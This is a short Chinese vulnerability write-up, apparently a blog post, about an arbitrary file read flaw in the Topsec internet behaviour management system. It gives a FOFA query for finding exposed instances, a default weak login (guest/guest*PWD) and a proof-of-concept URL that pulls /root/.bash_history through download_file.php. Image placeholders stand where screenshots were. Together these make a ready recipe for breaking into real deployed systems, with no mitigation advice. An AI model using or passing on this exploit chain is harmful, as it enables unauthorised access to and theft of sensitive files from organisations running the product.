天融信上网行为管理系统存在任意文件读取漏洞

0x01 漏洞介绍

天融信-上网行为管理系统存在弱口令漏洞并存在任意文件读取漏洞,攻击者可利用该漏洞获取服务器上的铭感文件。

0x02 漏洞复现

fofa语法

app="天融信-上网行为管理系统"

fofa上看了一波,还是有很多资产的

image-20210730102155660

弱口令:guest/guest*PWD

image-20210730102435761

POC:https://xxxxxxx/view/action/download_file.php?filename=/root/.bash_history&savename=

image-20210730102637284